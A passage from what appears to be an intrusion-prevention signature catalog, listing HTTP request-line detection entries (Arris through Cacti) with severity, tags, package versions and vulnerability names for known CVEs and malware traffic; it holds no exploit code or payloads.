Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: ARMBot-Botnet
Description:
Back to top

HTTP_CRL-Arris-TR3300-Command-Injection-CVE-2022-27002

About this situation: An attempt to exploit a vulnerability in Arris TR3300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Arris TR3300, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Arris-TR3300-Command-Injection-CVE-2022-27002
Description:
Back to top

HTTP_CRL-Arris-VAP2500-Management-Portal-Command-Execution

About this situation: An attempt to exploit an Arris VAP2500 Management Portal Command Execution vulnerability.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Arris VAP2500, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Arris-VAP2500-Management-Portal-Command-Execution
Description:
Back to top

HTTP_CRL-Artica-Proxy-Cyrus.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Artica Tech Artica Proxy detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, Artica Tech Artica Mail appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1273-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Artica-Proxy-Cyrus.php-Command-Injection
Description:
Back to top

HTTP_CRL-ASePortal-Parameter-SQL-Injection

About this situation: An attempt to exploit an ASePortal Parameter SQL Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ASePortal, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-727-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: ASePortal-Parameter-SQL-Injection
Description:
Back to top

HTTP_CRL-Asus-RT-AC3200-Command-Injection

About this situation: An attempt to exploit a vulnerability in Asus RT AC3200 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ASUS RT, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: Asus-RT-AC3200-Command-Injection
Description:
Back to top

HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection

About this situation: An attempt to exploit a vulnerability in Atlassian Bitbucket Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian Bitbucket, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection
Description:
Back to top

HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection

About this situation: An attempt to exploit a vulnerability in Atlassian Bitbucket Server and Data Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian Bitbucket, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1537-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection
Description:
Back to top

HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-1

About this situation: An attempt to exploit a vulnerability in Atlassian Crowd detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian Crowd, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Atlassian-Crowd-pdkinstall-CVE-2019-11580
Description:
Back to top

HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-2

About this situation: An attempt to exploit a vulnerability in Atlassian Crowd detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian Crowd, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1306-5242
Vulnerability: Atlassian-Crowd-pdkinstall-CVE-2019-11580
Description:
Back to top

HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-XSS
Description:
Back to top

HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Vulnerability: Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CRL-Atlassian-Remote-File-Access

About this situation: An attempt to exploit an Atlassian Remote File Access vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian, CVE2012, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Vulnerability: Atlassian-Remote-File-Access
Description:
Back to top

HTTP_CRL-Atmosphere-Framework-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Atmosphere Framework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Atmosphere Framework, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: Atmosphere-Framework-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-ATutor-SQL-Injection

About this situation: An attempt to exploit an ATutor SQL Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ATutor, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: ATutor-SQL-Injection
Description:
Back to top

HTTP_CRL-Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Avaya IP Office Customer Call Reporter detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Avaya IP Office Customer Call Reporter, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-496-5211
Last changed: sgpkg-ips-1008-5242
Vulnerability: Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload
Description:
Back to top

HTTP_CRL-Aviatrix-Controller-Command-Injection-CVE-2024-50603

About this situation: An attempt to exploit a vulnerability in Aviatrix Controller detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Aviatrix Controller, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: Aviatrix-Controller-Command-Injection-CVE-2024-50603
Description:
Back to top

HTTP_CRL-Aviatrix-Controller-File-Upload-CVE-2021-40870

About this situation: An attempt to exploit a vulnerability in Aviatrix Controller
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Aviatrix Controller, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Vulnerability: Aviatrix-Controller-File-Upload-CVE-2021-40870
Description:
Back to top

HTTP_CRL-Avideo-WWBNIndex-Plugin-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in WWBN AVideo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Any Hardware, WWBN AVideo, CVE2024, Windows not specific, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Vulnerability: Avideo-WWBNIndex-Plugin-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029

About this situation: An attempt to exploit a vulnerability in AVTECH IP camera AVM1203 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, AVTECH IP camera AVM1203, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029
Description:
Back to top

HTTP_CRL-Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in AVTECH IP camera firmware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, AVTECH IP camera, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities
Description:
Back to top

HTTP_CRL-Awstats-Configdir-Parameter-System-Compromise-2

About this situation: AWStats arbitrary command execution
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, AWStats, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-170-2032
Last changed: sgpkg-ips-170-2032
Vulnerability: HTTP-Awstats-Configdir-Parameter-System-Compromise
Description:
Back to top

HTTP_CRL-Awstats-Logfile-Parameter-Command-Execution-2

About this situation: AWStats arbitrary command execution
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, AWStats, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-170-2032
Last changed: sgpkg-ips-170-2032
Vulnerability: HTTP-Awstats-Logfile-Parameter-Command-Execution
Description:
Back to top

HTTP_CRL-Backdoor-ENM-Detected

About this situation: Backdoor-EMN Detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Backdoor-ENM-Malware
Description:
Back to top

HTTP_CRL-Bagle-Spambot

About this situation: Bagle spambot command and control channel communication detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Bagle spambot, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: Bagle-Spambot
Description:
Back to top

HTTP_CRL-Banker-Trojan-Keylogger

About this situation: Possible Banker trojan keylogger traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Banker, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-901-5242
Last changed: sgpkg-ips-901-5242
Description:
Back to top

HTTP_CRL-Barco-WePresent-File_transfer.cgi-Command-Injection

About this situation: An attempt to exploit a vulnerability in Barco WePresent detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Barco WePresent, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1219-5242
Vulnerability: Barco-WePresent-File_transfer.cgi-Command-Injection
Description:
Back to top

HTTP_CRL-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in Bourne Again Shell (bash)
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

HTTP_CRL-Bea-AquaLogic-Cross-Site-Scripting-CVE-2008-0867

About this situation: An attempt to exploit a vulnerability in BEA AquaLogic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-Beck-Ipc-Chip-HTTP-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Beck Ipc@Chip detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Beck GmbH IPC@CHIP, Windows not specific, Linux not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Beck-Ipc-Chip-HTTP-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589

About this situation: An attempt to exploit a vulnerability in BeyondTrust Remote Support detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, BeyondTrust Remote Support, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589
Description:
Back to top

HTTP_CRL-BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258

About this situation: An attempt to exploit a vulnerability in BillQuick Web Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, BillQuick Web Suite, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258
Description:
Back to top

HTTP_CRL-Blackenergy-Bot-Traffic

About this situation: BlackEnergy bot traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Blackenergy-Bot
Description:
Back to top

HTTP_CRL-Blazefind

About this situation: BlazeFind traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, BlazeFind, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Blazefind
Description:
Back to top

HTTP_CRL-Bludit-Directory-Traversal-Image-File-Upload

About this situation: An attempt to exploit a vulnerability in Bludit detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Bludit, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1413-5242
Vulnerability: Bludit-Directory-Traversal-Image-File-Upload
Description:
Back to top

HTTP_CRL-Bnbform-Hidden-Field-Manipulation

About this situation: Bnbform Hidden Field Manipulation
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Unix, Any Hardware, BNBForm, CVE1999, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-Bnbform-Hidden-Field-Manipulation
Description:
Back to top

HTTP_CRL-Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Borland AccuRev detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Borland AccuRev, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Brocade Network Advisor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Brocade Network Advisor, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-851-5242
Vulnerability: Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal
Description:
Back to top

HTTP_CRL-BYOB-Arbitrary-File-Write-And-Command-Injection

About this situation: An attempt to exploit a vulnerability in Build Your Own Botnet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Build Your Own Botnet, CVE2024, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Vulnerability: BYOB-Arbitrary-File-Write-And-Command-Injection
Description:
Back to top

HTTP_CRL-CA-Total-Defense-Suite-SQL-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in CA Total Defense Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CA Total Defense Suite, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-649-5211
Vulnerability: Generic_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection

About this situation: An attempt to exploit a vulnerability in CA Total Defense Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CA Total Defense Suite, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
Description:
Back to top

HTTP_CRL-CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in CA Unified Infrastructure Management detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, CA Unified Infrastructure Management, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal
Description:
Back to top

HTTP_CRL-CA-XOsoft-Products-Xosoapapi-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in CA XOsoft products detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, CA XOsoft, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: CA-XOsoft-Products-Xosoapapi-Buffer-Overflow
Description:
Back to top

HTTP_CRL-CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection

About this situation: An attempt to exploit a vulnerability in CachetHQ Cachet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CachetHQ Cachet, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Vulnerability: CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection
Description:
Back to top

HTTP_CRL-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Vulnerability: Cacti-Group-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS

About this situation: An attempt to exploit a vulnerability in Cacti Group detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Vulnerability: Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Color.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Cacti-Group-Cacti-Color.php-SQL-Injection
Cacti-Color-Filter-SQLi-To-RCE
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Graphs.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1221-5242
Last changed: sgpkg-ips-1221-5242
Vulnerability: Cacti-Group-Cacti-Graphs.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Managers-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Cacti-Group-Cacti-Managers-SQL-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-poller_automation.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Cacti, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1234-5242
Last changed: sgpkg-ips-1234-5242
Vulnerability: Cacti-Group-Cacti-poller_automation.php-Command-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-poller_Host_Duplicate-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Cacti-Group-poller_Host_Duplicate-SQL-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Remote_Agent-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Cacti, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1543-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Cacti-Group-Cacti-Remote_Agent-Command-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-Rrdtool-Crlf-Injection

About this situation: An attempt to exploit a vulnerability in Cacti
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Cacti-Group-Cacti-Rrdtool-Crlf-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Cacti, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection
Description:
Back to top

HTTP_CRL-Cacti-Group-Cacti-SQL_Save-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Cacti-Group-Cacti-SQL_Save-SQL-Injection
Description:
Back to top

HTTP_CRL-Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
